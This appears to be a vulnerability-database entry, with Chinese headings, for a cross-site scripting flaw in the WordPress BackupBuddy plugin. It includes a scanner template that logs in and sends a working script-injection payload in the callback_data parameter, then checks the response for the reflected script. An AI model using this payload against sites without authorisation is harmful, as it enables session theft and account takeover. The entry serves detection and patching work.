CVE-2022-4897: WordPress BackupBuddy <8.8.3 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: WordPress BackupBuddy | POC: 已公开

漏洞描述

WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2022-4897

info:
  name: WordPress BackupBuddy <8.8.3 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 8.8.3.
  reference:
    - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4897
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4897
    cwe-id: CWE-79
    epss-score: 0.1033
    epss-percentile: 0.92914
    cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ithemes
    product: backupbuddy
    framework: wordpress
  tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "onload=alert(document.domain)")'
          - 'contains(body_2, "BackupBudddy iFrame")'
        condition: and
# digest: 4a0a00473045022100cf07d451fa18ecfb705fa26cc031514f6acb71516c814f58159c439381109e27022068489c258f494192a80051f0740ebbfb16850e96de29d3250e44720404249668:922c64590222798bb761d5b6d8e72950